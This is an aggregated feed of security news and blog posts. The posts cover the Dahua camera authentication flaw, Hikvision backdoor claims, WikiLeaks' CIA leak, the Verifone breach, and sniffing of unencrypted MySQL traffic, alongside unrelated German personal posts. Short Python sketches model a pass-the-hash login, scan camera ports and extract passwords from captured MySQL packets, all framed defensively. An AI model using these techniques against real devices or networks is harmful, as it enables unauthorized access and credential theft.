On March 5, a security researcher named Bashis posted to the Full Disclosure security mailing list exploit code for an embarrassingly simple flaw in the way many Dahua security cameras and DVRs handle authentication. These devices are designed to be controlled by a local Web server that is accessible via a Web browser.

That server requires the user to enter a username and password, but Bashis found he could force all affected devices to cough up their usernames and a simple hashed value of the password. Armed with this information, he could effectively “pass the hash” and the corresponding username right back to the Web server and be granted access to the device settings page. From there, he could add users and install or modify the device’s software. From Full Disclosure:

“This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices

“This is like a damn Hollywood hack, click on one button and you are in…”
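The flaw Bashis describes can be modeled in a few lines. In this simplified Python sketch (an illustration, not Dahua's actual code or hash scheme), the device compares a client-supplied token directly against the stored password hash, so anyone who can download the user database can log in without ever learning a password:

```python
import hashlib

# toy user database of the kind the devices leaked; MD5 here is illustrative
users = {"admin": hashlib.md5(b"secret").hexdigest()}

def flawed_login(username, token):
    # BUG: the stored hash itself acts as the credential, so a leaked
    # database lets an attacker "pass the hash" straight back
    return users.get(username) == token

leaked_hash = users["admin"]                 # steps 1-2: dump the DB, copy the hash
assert flawed_login("admin", leaked_hash)    # step 3: log in with the hash alone
assert not flawed_login("admin", "wrong")
```

A challenge-response scheme, where the server sends a fresh nonce and the client proves knowledge of the password relative to it, would have made the leaked hashes useless on their own.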

Bashis said he was so appalled at the discovery that he labeled it an apparent “backdoor” — an undocumented means of accessing an electronic device that often only the vendor knows about. Enraged, Bashis decided to publish his exploit code without first notifying Dahua. Later, Bashis said he changed his mind after being contacted by the company and agreed to remove his code from the online posting.

Unfortunately, that ship may have already sailed. Bashis’s exploit code already has been copied in several other places online as of this publication.

Asked why he took down his exploit code, Bashis said in an interview with KrebsOnSecurity that “The hack is too simple, way too simple, and now I want Dahua’s users to get patched firmware’s before they will be victims to some botnet.”

In an advisory published March 6, Dahua said it has identified nearly a dozen of its products that are vulnerable, and that further review may reveal additional models also have this flaw. The company is urging users to download and install the newest firmware updates as soon as possible. Here are the models known to be affected so far:

DH-IPC-HDW23A0RN-ZS
DH-IPC-HDBW23A0RN-ZS
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DHI-HCVR51A04HE-S3
DHI-HCVR51A08HE-S3
DHI-HCVR58A32S-S2

It’s not clear exactly how many devices worldwide may be vulnerable. Bashis says that’s a difficult question to answer, but that he “wouldn’t be surprised if 95 percent of Dahua’s product line has the same problem,” adding, “And also possible their OEM clones.”

Dahua has not yet responded to my questions or request for comment. I’ll update this post if things change on that front.

This is the second time in a week that a major Chinese IoT firm has urgently warned its customers to update the firmware on their devices. For weeks, experts have been warning that there are signs of attackers exploiting an unknown backdoor or equally serious vulnerability in cameras and DVR devices made by IoT giant Hikvision.

Writing for video surveillance publication IPVM, Brian Karas reported on March 2 that he was hearing from multiple Hikvision security camera and DVR users who suddenly were locked out of their devices and had new “system” user accounts added without their permission.

Karas said the devices in question all were set up to be remotely accessible over the Internet, and were running with the default credentials (12345). Karas noted that there don’t appear to be any Hikvision devices sought out by the Mirai worm — the now open-source malware that is being used to enslave IoT devices in a botnet for launching crippling online attacks (in contrast, Dahua’s products are hugely represented in the list of systems being sought out by the Mirai worm.)

In addition, a programmer who has long written and distributed custom firmware for Hikvision devices claims he’s found a backdoor in “many popular Hikvision products that makes it possible to gain full admin access to the device,” wrote the user “Montecrypto” on the IoT forum IPcamtalk on Mar. 5. “Hikvision gets two weeks to come forward, acknowledge, and explain why the backdoor is there and when it is going to be removed. I sent them an email. If nothing changes, I will publish all details on March 20th, along with the firmware that disables the backdoor.”

According to IPVM’s Karas, Hikvision has not acknowledged an unpatched backdoor or any other equivalent weakness in its product. But on Mar. 2, the company issued a reminder to its integrator partners about the need to be updated to the latest firmware.

A special bulletin issued Mar. 2, 2017 by Hikvision. Image: IPVM
“Hikvision has determined that there is a scripted application specifically targeting Hikvision NVRs and DVRs that meet the following conditions: they have not been updated to the latest firmware; they are set to the default port, default user name, and default password,” the company’s statement reads. “Hikvision has required secure activation since May of 2015, making it impossible for our integrator partners to install equipment with default settings. However, it was possible, before that date, for integrators to install NVRs and DVRs with default settings. Hikvision strongly recommends that our dealer base review the security levels of equipment installed prior to June 2015 to ensure the use of complex passwords and upgraded firmware to best protect their customers.”

ANALYSIS

I don’t agree with Bashis’s conclusion that the Dahua flaw was intentional; it appears that the makers of these products simply did not invest much energy, time or money in building security into the software. Rather, security is clearly an afterthought, bolted on after the fact, which is why nobody should trust these devices.

The truth is that the software that runs on a whole mess of these security cameras and DVRs is very poorly written, and probably full of more security holes just like the flaw Dahua users are dealing with right now. To hope or wish otherwise given what we know about the history of these cheap electronic devices seems sheer folly.

In December, KrebsOnSecurity warned that many Sony security cameras contained a backdoor that can only be erased by updating the firmware on the devices.

Some security experts maintain that these types of flaws can’t be easily exploited when the IoT device in question is behind a firewall. But that advice just doesn’t hold water for today’s IoT cameras and DVRs. For one thing, a great many security cameras and other IoT devices will punch a hole in your firewall straight away without your permission, using a technology called Universal Plug-and-Play (UPnP).

In other cases, IoT products are incorporating peer-to-peer (P2P) technology that cannot be turned off and exposes users to even greater threats.  In that same December 2016 story referenced above, I cited research from security firm Cybereason, which found at least two previously unknown security flaws in dozens of IP camera families that are white-labeled under a number of different brands (and some without brands at all).

“Cybereason’s team found that they could easily exploit these devices even if they were set up behind a firewall,” that story noted. “That’s because all of these cameras ship with a factory-default peer-to-peer (P2P) communications capability that enables remote ‘cloud’ access to the devices via the manufacturer’s Web site — provided a customer visits the site and provides the unique camera ID stamped on the bottom of the devices.”

The story continued:

“Although it may seem that attackers would need physical access to the vulnerable devices in order to derive those unique camera IDs, Cybereason’s principal security researcher Amit Serper said the company figured out a simple way to enumerate all possible camera IDs using the manufacturer’s Web site.”

My advice? Avoid the P2P models like the plague. If you have security cameras or DVR devices that are connected to the Internet, make sure they are up to date with the latest firmware. Beyond that, consider completely blocking external network access to the devices and enabling a VPN if you truly need remote access to them.

Howtogeek.com has a decent tutorial on setting up your own VPN to enable remote access to your home or business network; on picking a decent router that supports VPNs; and installing custom firmware like DD-WRT on the router if available (because, as we can see, stock firmware usually is some horribly insecure and shoddy stuff).

If you’re curious about an IoT device you purchased and what it might do after you connect it to a network, the information is there if you know how and where to look. This Lifehacker post walks through some of the basic software tools and steps that even a novice can follow to learn more about what’s going on across a local network.
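As a starting point, even a few lines of Python can check whether a device on your LAN is exposing the TCP ports cameras and DVRs commonly use. This is a rough sketch; the port list and the example address are illustrative, not authoritative:

```python
import socket

def is_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Ports often exposed by consumer cameras and DVRs (illustrative, not exhaustive):
# 80/443 = web interface, 554 = RTSP video stream, 23 = telnet (a red flag if open)
CAMERA_PORTS = [23, 80, 443, 554]

def scan_device(host: str) -> dict:
    """Check each port of interest on a single LAN device."""
    return {port: is_port_open(host, port) for port in CAMERA_PORTS}

# Usage (substitute your device's actual LAN address):
#   print(scan_device("192.168.1.108"))
```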
Top

Network attacks on MySQL, Part 1: Unencrypted connections

Postby Daniël van Eeden via Daniël's Database Blog »

Intro

In this series of blog posts I will explain what different attacks on MySQL network traffic look like and what you can do to secure your systems against these kinds of attacks.

How to gain access

To capture MySQL network traffic you can use tcpdump, dumpcap, snoop or whatever packet-capture tool your OS provides. This can be done on any device that is part of the connection: the server, the client, routers, switches, etc.

Besides application-to-database traffic this attack can also be done on replication traffic.

Results

This allows you to extract queries and result sets.
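To illustrate how little work that extraction takes, here is a sketch of decoding one captured, unencrypted packet. The MySQL client/server protocol frames each packet with a 3-byte little-endian payload length and a 1-byte sequence id; a COM_QUERY payload starts with the byte 0x03 followed by the SQL text:

```python
def parse_mysql_packet(data: bytes):
    """Split one MySQL wire packet into (sequence_id, payload).

    Framing: 3-byte little-endian payload length, 1-byte sequence id, payload.
    """
    length = int.from_bytes(data[:3], "little")
    return data[3], data[4:4 + length]

def extract_query(payload: bytes):
    """Return the SQL text if the payload is a COM_QUERY (first byte 0x03)."""
    if payload and payload[0] == 0x03:
        return payload[1:].decode("utf-8", errors="replace")
    return None

# Reassemble a COM_QUERY packet exactly as it would appear in a capture:
sql = b"SET PASSWORD FOR 'myuser'@'%' = PASSWORD('foo')"
payload = b"\x03" + sql
raw = len(payload).to_bytes(3, "little") + b"\x00" + payload

seq, body = parse_mysql_packet(raw)
print(extract_query(body))  # the new password is right there in plain text
```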

The default authentication plugin, mysql_native_password, uses a nonce to protect against password sniffing. But when you change a password, the new password is sent across the wire in plain text by default. Note that MySQL 5.6 and newer have some protection which ensures passwords are not written to the log files, but this feature won't secure your network traffic.

In the replication stream, however, there are fewer places where passwords are exposed. This is especially true for row-based replication, but it can also hold for statement-based replication.

Some examples:

SET PASSWORD FOR 'myuser'@'%' = PASSWORD('foo'); -- deprecated syntax
UPDATE secrets SET secret_value = AES_ENCRYPT('foo', 'secret') WHERE id=5;
Both the password and the encryption key are visible in plain text in application-to-server traffic, but not in RBR replication traffic.

There is a trick to make this somewhat more secure, especially on 5.5 and older:

SELECT PASSWORD('foo') INTO @pwd;
SET PASSWORD FOR 'myuser'@'%' = @pwd;
If your application stores plain-text passwords in MySQL: you're doing it wrong. If your application stores hashed passwords (with salt, etc.), that is OK provided the hashing is done in the application. But note that a man-in-the-middle might send a slightly altered result set to your application and thereby gain access to it, although that requires an active attack.

The attacks at this level are mostly passive, which makes them hard to detect. An attacker might sniff password hashes for your application, brute-force them and then log in to your application. The only thing you will see in your logs is a successful login...
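As an aside on hashing in the application, here is one way to do salted, slow hashing with Python's standard library (a sketch; the iteration count is illustrative and should be tuned to your hardware). A sniffed hash can still be brute-forced offline, which is exactly the attack described above, so a deliberately slow KDF raises the attacker's cost:

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # illustrative; tune to your hardware

def hash_password(password: str, salt: bytes = None):
    """Derive a salted PBKDF2-HMAC-SHA256 digest to store instead of the password."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute the digest and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)
```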

To protect against this attack:

  1. Use SSL/TLS
  2. Encrypt/decrypt values in the application before inserting them into the database.
  3. Use a SSH tunnel (Workbench has built-in support for this)
  4. Use a local TCP or UNIX domain socket when changing passwords.[1]
  5. Don't use the MySQL protocol over the internet w/o encryption. Use a VPN or SSH.
For sensitive data you should preferably combine items 1 and 2. Items 3 and 4 are mostly for ad-hoc DBA access.

Keep in mind that there might be some cron jobs, backups, etc. which also need to use a secure connection. Of course you should also protect your data files and backup files, but that's not what this post is about.

[1] It is possible to snoop on UNIX domain socket traffic, but an attacker who has that access probably has full system access and might more easily use an active attack.
Top

WikiLeaks: We’ll Work With Software Makers on Zero-Days

Postby BrianKrebs via Krebs on Security »

When WikiLeaks on Tuesday dumped thousands of files documenting hacking tools used by the U.S. Central Intelligence Agency, many feared WikiLeaks would soon publish a trove of so-called “zero days,” the actual computer code that the CIA uses to exploit previously unknown flaws in a range of software and hardware products used by consumers and businesses. But on Thursday, WikiLeaks editor-in-chief Julian Assange promised that his organization would work with hardware and software vendors to fix the security weaknesses prior to releasing additional details about the flaws.

“After considering what we think is the best way to proceed, and hearing these calls from some of the manufacturers, we have decided to work with them to give them exclusive access to additional technical details we have, so that fixes can be developed and pushed out,” Assange said in a press conference put on by his organization. “Once this material is effectively disarmed by us, we will publish additional details about what has been occurring.”

Source: Twitter
So-called “zero-day” flaws refer to vulnerabilities in hardware or software products that vendors first learn about when those flaws are already under active attack (i.e., the vendor has “zero days” to fix the vulnerability before it begins affecting its customers and users). Zero-day flaws are highly prized by cybercriminals and nation states alike because they potentially allow attackers to stealthily bypass a target’s digital defenses.

It’s unclear if WikiLeaks’ decision to work with software makers on zero-days was influenced by a poll the organization took via its Twitter page over the past few days. The tweet read: “Tech companies are saying they need more details of CIA attack techniques to fix them faster. Should WikiLeaks work directly with them?”

So far, just over 38,000 people have responded, with a majority (57 percent) saying “Yes, make people safe,” while only 36 percent selected “no, they’re part of the problem.”

Assange didn’t offer additional details about the proposed information-sharing process he described, such as whether WikiLeaks would seek to work with affected vendors individually or if it might perhaps rely on a trusted third-party or third-parties to assist in that process.

But WikiLeaks seemed eager to address concerns voiced by many tech experts that leaking details about how to exploit these cyber attack weapons developed by the CIA would leave consumers and businesses caught in the middle as crooks and individual actors attempt to use the exploits for personal or financial gain. Perhaps to assuage such concerns, Assange said his vision for WikiLeaks was to act as a “neutral digital Switzerland that assists people all over the world to be secure.”

Nevertheless, even just the documentation on the CIA’s hacking tools that was released this week may offer curious and skilled hackers some strong pointers about where to look for unpatched security flaws that could be used to compromise systems running those software products. It will be interesting to see if and how often security researchers and bug hunters going forward credit the WikiLeaks CIA document dump for leading their research in a direction they hadn’t before considered.
Top

pclinuxos64-kde5-2017.03.iso

Postby bed via Zockertown: Nerten News »

Prompted by a discussion in my favorite forum, I gave the live version of pclinuxos64-kde5-2017.03 a quick try.

Positive: all Fn keys (volume, keyboard backlight, screen brightness) work right away.

Suspend-to-RAM when closing the lid, and waking up again, works perfectly and quickly.

I had to hunt around a bit for WiFi, but it works.

The Nvidia driver was installed automatically and works. Bravo.

Negative, or at least unusual: see the screenshot; something is off with the fonts, isn't it?

I experienced two crashes while playing around with localisation settings; well, that may be down to the live system.

Oh, and the test machine was my current laptop, a Tuxedo XC1506.



Top

Product names, and what I think of them

Postby bed via Zockertown: Nerten News »

How much of an ingredient does a product have to contain for that ingredient to come first in its name?

For liverwurst, for example, this is clearly regulated. And for vegetarian products?

There is a spread from DM whose jar says "Ingwer-Linse" (ginger-lentil), with "Ingwer" prominently emphasized.

On dm's website I find the toned-down, reversed name: dmBio Aufstrich Linse-Ingwer.

OK, I thought, I can give it a try. I tried it and I can't believe it: barely any detectable ginger flavor. A look at the label reveals: 0.7% ginger.

Folks, are you kidding me? Less than 1% ginger?

Top

megaglest

Postby bed via Zockertown: Nerten News »

I compiled Glest from source and tried it what feels like 250 years ago. If I remember correctly it was a real disappointment at the time, because the game didn't come close to the Warcraft series. Somehow I lost track of it; maybe there were simply other things going on back then.

Many years have passed since. Glest is practically dead, but a spinoff, MegaGlest, entered the stage in 2012 and has reached a quality that blew me away.

Today (2017-01-21 19:12) I stumbled across it by chance, installed megaglest from the Debian repository and gave it a spin.

I would like to formally thank everyone involved, not just the developers, for staying on the ball.

Wikipedia has a nice article on MegaGlest, so rather than publishing a plagiarism of it here, I will point the interested reader to the Wikipedia article.

For me the most striking feature is the ability to zoom, which shows off the lovingly crafted character animations.

PS: Why am I only publishing this now? Because I hadn't noticed that the post was still marked as a draft.
Top

WikiLeaks Dumps Docs on CIA’s Hacking Tools

Postby BrianKrebs via Krebs on Security »

WikiLeaks on Tuesday dropped one of its most explosive word bombs ever: A secret trove of documents apparently stolen from the U.S. Central Intelligence Agency (CIA) detailing methods of hacking everything from smart phones and TVs to compromising Internet routers and computers. KrebsOnSecurity is still digesting much of this fascinating data cache, but here are some first impressions based on what I’ve seen so far.

First, to quickly recap what happened: In a post on its site, WikiLeaks said the release — dubbed “Vault 7” — was the largest-ever publication of confidential documents on the agency. WikiLeaks is promising a series of these document caches; this first one includes more than 8,700 files allegedly taken from a high-security network inside CIA’s Center for Cyber Intelligence in Langley, Va.

The home page for the CIA’s “Weeping Angel” project, which sought to exploit flaws that could turn certain 2013-model Samsung “smart” TVs into remote listening posts.
“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized ‘zero day’ exploits, malware remote control systems and associated documentation,” WikiLeaks wrote. “This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.”

Wikileaks said it was calling attention to the CIA’s global covert hacking program, its malware arsenal and dozens of weaponized exploits against “a wide range of U.S. and European company products, includ[ing] Apple’s iPhone, Google’s Android and Microsoft’s Windows and even Samsung TVs, which are turned into covert microphones.”

The documents for the most part don’t appear to include the computer code needed to exploit previously unknown flaws in these products, although WikiLeaks says those exploits may show up in a future dump. This collection is probably best thought of as an internal corporate wiki used by multiple CIA researchers who methodically found and documented weaknesses in a variety of popular commercial and consumer electronics.

For example, the data dump lists a number of exploit “modules” available to compromise various models of consumer routers made by companies like Linksys, MikroTik and Zyxel, to name a few. CIA researchers also collated several pages’ worth of notes on probing and testing weaknesses in business-class devices from Cisco, whose powerful routers carry a decent portion of the Internet’s traffic on any given day. Craig Dods, a researcher with Cisco’s rival Juniper, delves into greater detail on the Cisco bugs for anyone interested (Dods says he found no exploits for Juniper products in the cache, yet). Meanwhile, Cisco has published its own blog post on the matter.

WHILE MY SMART TV GENTLY WEEPS

Some of the exploits discussed in these leaked CIA documents appear to reference full-on, remote access vulnerabilities. However, a great many of the documents I’ve looked at seem to refer to attack concepts or half-finished exploits that may be limited by very specific requirements — such as physical access to the targeted device.

The “Weeping Angel” project’s page from 2014 is a prime example: It discusses ways to turn certain 2013-model Samsung “smart TVs” into remote listening devices; methods for disabling the LED lights that indicate the TV is on; and suggestions for fixing a problem with the exploit in which the WiFi interface on the TV is disabled when the exploit is run.

ToDo / Future Work:
Build a console cable

Turn on or leave WiFi turned on in Fake-Off mode

Parse unencrypted audio collection
Clean-up the file format of saved audio. Add encryption??

According to the documentation, Weeping Angel worked as long as the target hadn’t upgraded the firmware on the Samsung TVs. It also said the firmware upgrade eliminated the “current installation method,” which apparently required the insertion of a booby-trapped USB device into the TV.

Don’t get me wrong: This is a serious leak of fairly sensitive information. And I sincerely hope Wikileaks decides to work with researchers and vendors to coordinate the patching of flaws leveraged by the as-yet unreleased exploit code archive that apparently accompanies this documentation from the CIA.

But in reading the media coverage of this leak, one might be led to believe that even if you are among the small minority of Americans who have chosen to migrate more of their communications to privacy-enhancing technologies like Signal or WhatsApp, it’s all futile because the CIA can break it anyway.

Perhaps a future cache of documents from this CIA division will change things on this front, but an admittedly cursory examination of these documents indicates that the CIA’s methods for weakening the privacy of these tools all seem to require attackers to first succeed in deeply subverting the security of the mobile device — either through a remote-access vulnerability in the underlying operating system or via physical access to the target’s phone.

As Bloomberg’s tech op-ed writer Leonid Bershidsky notes, the documentation released here shows that these attacks are “not about mass surveillance — something that should bother the vast majority of internet users — but about monitoring specific targets.”

By way of example, Bershidsky points to a tweet yesterday from Open Whisper Systems (the makers of the Signal private messaging app) which observes that, “The CIA/Wikileaks story today is about getting malware onto phones, none of the exploits are in Signal or break Signal Protocol encryption.”

The company went on to say that because more online services are now using end-to-end encryption to prevent prying eyes from reading communications that are intercepted in-transit, intelligence agencies are being pushed “from undetectable mass surveillance to expensive, high-risk, targeted attacks.”

A tweet from Open Whisper Systems, the makers of the popular mobile privacy app Signal.
As limited as some of these exploits appear to be, the methodical approach of the countless CIA researchers who apparently collaborated to unearth these flaws is impressive and speaks to a key problem with most commercial hardware and software today: The vast majority of vendors would rather spend the time and money marketing their products than embark on the costly, frustrating, time-consuming and continuous process of stress-testing their own products and working with a range of researchers to find these types of vulnerabilities before the CIA or other nation-state-level hackers can.

Of course, not every company has a budget of hundreds of millions of dollars just to do basic security research. According to this NBC News report from October 2016, the CIA’s Center for Cyber Intelligence (the alleged source of the documents discussed in this story) has a staff of hundreds and a budget in the hundreds of millions: Documents leaked by NSA whistleblower Edward Snowden indicate the CIA requested $685.4 million for computer network operations in 2013, compared to $1 billion by the U.S. National Security Agency (NSA).

TURNABOUT IS FAIR PLAY?

NBC also reported that the CIA’s Center for Cyber Intelligence was tasked by the Obama administration last year to devise cyber attack strategies in response to Russia’s alleged involvement in the siphoning of emails from Democratic National Committee servers as well as from Hillary Clinton‘s campaign chief John Podesta. Those emails were ultimately published online by Wikileaks last summer.

NBC reported that the “wide-ranging ‘clandestine’ cyber operation designed to harass and ’embarrass’ the Kremlin leadership was being led by the CIA’s Center for Cyber Intelligence.” Could this attack have been the Kremlin’s response to an action or actions by the CIA’s cyber center? Perhaps time (or future leaks) will tell.

Speaking of the NSA, the Wikileaks dump comes hot on the heels of a similar disclosure by The Shadow Brokers, a hacking group that said it stole malicious software from the Equation Group, a highly-skilled and advanced threat actor that has been closely tied to the NSA.

What’s interesting is this Wikileaks cache includes a longish discussion thread among CIA employees who openly discuss where the NSA erred in allowing experts to tie the NSA’s coders to malware produced by the Equation Group. As someone who spends a great deal of time unmasking cybercriminals who invariably leak their identity and/or location through poor operational security, I was utterly fascinated by this exchange.

BUG BOUNTIES VS BUG STOCKPILES

Many are using this latest deluge from WikiLeaks to reopen the debate over whether there is enough oversight of the CIA’s hacking activities. The New York Times called yesterday’s WikiLeaks disclosure “the latest coup for the antisecrecy organization and a serious blow to the CIA, which uses its hacking abilities to carry out espionage against foreign targets.”

The WikiLeaks scandal also revisits the question of whether the U.S. government should, instead of hoarding and stockpiling vulnerabilities, be more open and transparent about its findings, or at least work privately with software vendors to get the bugs fixed for the greater good. After all, these advocates argue, the United States is perhaps the most technologically-dependent country on Earth: Surely we have the most to lose when (not if) these exploits get leaked? Wouldn’t it be better and cheaper if everyone who produced software sought to crowdsource the hardening of their products?

On that front, my email inbox was positively peppered Tuesday with emails from organizations that run “bug bounty” programs on behalf of corporations. These programs seek to discourage the “full disclosure” approach — e.g., a researcher releasing exploit code for a previously unknown bug and giving the affected vendor exactly zero days to fix the problem before the public finds out how to exploit it (hence the term “zero-day” exploit).

Rather, the bug bounties encourage security researchers to work closely and discreetly with software vendors to fix security vulnerabilities — sometimes in exchange for monetary reward and sometimes just for public recognition.

Casey Ellis, chief executive officer and founder of bug bounty program Bugcrowd, suggested the CIA WikiLeaks disclosure will help criminal groups and other adversaries, while leaving security teams scrambling.

“In this mix there are the targeted vendors who, before today, were likely unaware of the specific vulnerabilities these exploits were targeting,” Ellis said. “Right now, the security teams are pulling apart the Wikileaks dump, performing technical analysis, assessing and prioritizing the risk to their products and the people who use them, and instructing the engineering teams towards creating patches. The net outcome over the long-term is actually a good thing for Internet security — the vulnerabilities that were exploited by these tools will be patched, and the risk to consumers reduced as a result — but for now we are entering yet another Shadow Brokers, Stuxnet, Flame, Duqu, etc., a period of actively exploitable 0-day bouncing around in the wild.”

Ellis said that, in an ironic way, Wikileaks, the CIA, and the original exploit authors “have combined to provide the same knowledge as the ‘good old days’ of full disclosure — but with far less control and a great many more side-effects than if the vendors were to take the initiative themselves.”

“This, in part, is why the full disclosure approach evolved into the coordinated disclosure and bug bounty models becoming commonplace today,” Ellis said in a written statement. “Stories like that of Wikileaks today are less and less surprising and to some extent are starting to be normalized. It’s only when the pain of doing nothing exceeds the pain of change that the majority of organizations will shift to an proactive vulnerability discovery strategy and the vulnerabilities exploited by these toolkits — and the risk those vulnerabilities create for the Internet — will become less and less common.”

Many observers — including a number of cybersecurity professional friends of mine — have become somewhat inured to these disclosures, and argue that this is exactly the sort of thing you might expect an agency like the CIA to be doing day in and day out. Omer Schneider, CEO at a startup called CyberX, seems to fall into this camp.

“The main issue here is not that the CIA has its own hacking tools or has a cache of zero-day exploits,” Schneider said. “Most nation-states have similar hacking tools, and they’re being used all the time. What’s surprising is that the general public is still shocked by stories like these. Regardless of the motives for publishing this, our concern is that Vault7 makes it even easier for a crop of new cyber-actors to get in the game.”

This almost certainly won’t be the last time KrebsOnSecurity cites this week’s big CIA WikiLeaks trove. But for now I’m interested to hear what you, Dear Readers, found most intriguing about it. Sound off in the comments below.
Top

Payments Giant Verifone Investigating Breach

Postby BrianKrebs via Krebs on Security »

Credit and debit card payments giant Verifone [NYSE: PAY] is investigating a breach of its internal computer networks that appears to have impacted a number of companies running its point-of-sale solutions, according to sources. Verifone says the extent of the breach was limited to its corporate network and that its payment services network was not impacted.

San Jose, Calif.-based Verifone is the largest maker of credit card terminals used in the United States. It sells point-of-sale terminals and services to support the swiping and processing of credit and debit card payments at a variety of businesses, including retailers, taxis, and fuel stations.

On Jan. 23, 2017, Verifone sent an “urgent” email to all company staff and contractors, warning they had 24 hours to change all company passwords.

“We are currently investigating an IT control matter in the Verifone environment,” reads an email memo penned by Steve Horan, Verifone Inc.’s senior vice president and chief information officer. “As a precaution, we are taking immediate steps to improve our controls.”

An internal memo sent Jan. 23, 2017 by Verifone’s chief information officer to all staff and contractors, telling them to change their passwords. The memo also states that Verifone employees would no longer be able to install software at will, apparently something everyone at the company could do prior to this notice.
The internal Verifone memo — a copy of which was obtained by KrebsOnSecurity and is pictured above — also informed employees they would no longer be allowed to install software of any kind on company computers and laptops.

Asked about the breach reports, a Verifone spokesman said the company saw evidence in January 2017 of an intrusion in a “limited portion” of its internal network, but that the breach never impacted its payment services network.

An ad tied to Verifone’s petroleum services point-of-sale offerings.
“In January 2017, Verifone’s information security team saw evidence of a limited cyber intrusion into our corporate network,” Verifone spokesman Andy Payment said. “Our payment services network was not impacted. We immediately began work to determine the type of information targeted and executed appropriate measures in response. We believe today that due to our immediate response, the potential for misuse of information is limited.”

Verifone’s Mr. Payment declined to answer additional questions about the breach, such as how Verifone learned about it and whether the company was initially notified by an outside party. But a source with knowledge of the matter told KrebsOnSecurity.com that the employee alert Verifone sent out on Jan. 23, 2017 was in response to a notification that Verifone received from the credit card companies Visa and MasterCard just days earlier in January.

A spokesperson for Visa declined to comment for this story. MasterCard officials did not respond to requests for comment.

According to my source, the intrusion impacted at least one corner of Verifone’s business: a customer support unit based in Clearwater, Fla. that provides comprehensive payment solutions specifically to gas and petrol stations throughout the United States, including pay-at-the-pump credit card processing; physical cash registers inside the fuel station store; customer loyalty programs; and remote technical support.

The source said his employer shared with the card brands evidence that a Russian hacking group known for targeting payment providers and hospitality firms had compromised at least a portion of Verifone’s internal network.

The source says Visa and MasterCard were notified that the intruders appeared to have been inside of Verifone’s network since mid-2016. The source noted there is ample evidence the attackers used some of the same toolsets and infrastructure as the cybercrime gang thought to have hacked last year into Oracle’s MICROS division, a unit of Oracle that provides point-of-sale solutions to hundreds of thousands of retailers and hospitality firms.

Founded in Hawaii in 1981, Verifone now operates in more than 150 countries worldwide and employs nearly 5,000 people globally.

Update, 1:17 p.m. ET: Verifone circled back post-publication with the following update to their statement: “According to the forensic information to-date, the cyber attempt was limited to controllers at approximately two dozen gas stations, and occurred over a short time frame. We believe that no other merchants were targeted and the integrity of our networks and merchants’ payment terminals remain secure and fully operational.”

Sources told KrebsOnSecurity that Verifone commissioned an investigation of the breach from Foregenix Ltd., a digital forensics firm based in the United Kingdom that lists Verifone as a “strategic partner.” Foregenix declined to comment for this story.



ANALYSIS

In the MICROS breach, the intruders used a crimeware-as-a-service network called Carbanak, also known as Anunak. In that incident, the attackers compromised Oracle’s ticketing portal that Oracle uses to help MICROS’s hospitality customers remotely troubleshoot problems with their point-of-sale systems. The attackers reportedly used that access to plant malware on the support server so they could siphon MICROS customer usernames and passwords when those customers logged in to the support site.

Oracle’s very few public statements about that incident made it clear that the attackers were after information that could get them inside the electronic tills run by the company’s customers — not Oracle’s cloud or other service offerings. The company acknowledged that it had “detected and addressed malicious code in certain legacy Micros systems,” and that it had asked all MICROS customers to reset their passwords.

Avivah Litan, a financial fraud and endpoint solutions analyst for Gartner Inc., said the attackers in the Verifone breach probably also were after anything that would allow them to access customer payment terminals.

“The worst thing is the attackers have information on the point-of-sale systems that lets them put backdoors on the devices that can record, store and transmit stolen customer card data,” Litan said. “It sounds like they were after point-of-sale software information, whether the POS designs, the source code, or signing keys. Also, the company says it believes it stopped the breach in time, and that usually means they don’t know if they did. The bottom line is it’s very serious when the Verifone system gets breached.”

Verifone’s Jan. 23 “urgent” alert to its staff and contractors suggested that — prior to the intrusion — all employees were free to install or remove software at will. Litan said such policies are not uncommon and they certainly make it simpler for businesses to get work done, but she cautioned that allowing every user to install software anytime makes it easier for a hacker to do the same across multiple systems after compromising just a single machine inside the network.

“It sounds like [Verifone] found some malware in their network that must have come from an employee desktop because now they’re locking that down,” Litan said. “But the next step for these attackers is lateral movement within the victim’s network. And it’s not just within Verifone’s network at that point, it potentially expands to any connected partner network or through trusted zones.”

Litan said many companies choose to “whitelist” applications that they know and trust, but to block all others. She said the solutions can dramatically bring down the success rate of attacks, but that users tend to resist and dislike being restricted on their work devices.

“Most companies don’t put in whitelists because it’s hard to manage. But that’s hardly an excuse for not doing it. Whitelisting is very effective, it’s just a pain in the neck for users. You have to have a process and policies in place to support whitelisting, but it’s certainly doable. Yes, it’s been beaten in targeted attacks before — where criminals get inside and steal the code-signing keys, but it’s still probably the strongest endpoint security organizations can put in place.”

Verifone would not respond to questions about the duration of the breach in its corporate networks. But if, as sources say, this breach lasted more than six months, that’s an awful long time for an extremely skilled adversary to wander around inside your network undetected. Whether the intruders were able to progress from one segment of Verifone’s network to another would depend much on how segmented Verifone’s network is, as well as the robustness of security surrounding its various corporate divisions and many company acquisitions over the years.

The thieves who hacked Target Corp. in 2013, for example, were able to communicate with virtually all company cash registers and other systems within the company’s network because Target’s internal network resembled a single canoe instead of a massive ship with digital bulkheads throughout the vessel to stop a tiny breach in the hull from sinking the entire ship. Check out this story from Sept. 2015, which looked at the results of a confidential security test Target commissioned just days after the breach (spoiler alert, the testers were able to talk to every Target cash register in all 2,000 stores after remotely commandeering a deli scale at a single Target store).

Curious how a stolen card shop works? Check out this story.
